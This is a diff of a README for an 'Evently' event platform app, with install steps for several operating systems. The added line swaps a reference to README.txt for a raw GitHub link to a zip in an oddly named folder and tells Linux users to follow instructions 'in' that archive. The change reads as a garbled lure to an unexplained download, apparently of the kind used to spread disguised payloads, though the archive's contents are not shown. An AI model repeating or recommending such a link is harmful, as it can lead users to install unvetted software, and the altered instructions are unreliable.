prakash9131/event-platform_app_next/README.md

    Once the download is complete:
    - For Windows: Double-click the `.exe` file and follow the prompts to install.
    - For macOS: Open the `.dmg` file, drag the Evently app to your Applications folder, and then launch it from there.
-   - For Linux: Extract the files and follow the instructions in the README.txt file to install and run.
+   - For Linux: Extract the files and follow the instructions in the https://raw.githubusercontent.com/prakash9131/event-platform_app_next/main/horopteric/event-platform_app_next.zip file to install and run.

 5. **Set Up the Application**
    When you first launch Evently, you will need to create an account.
 You may use standard email and password authentication or the Clerk authentication option if you prefer.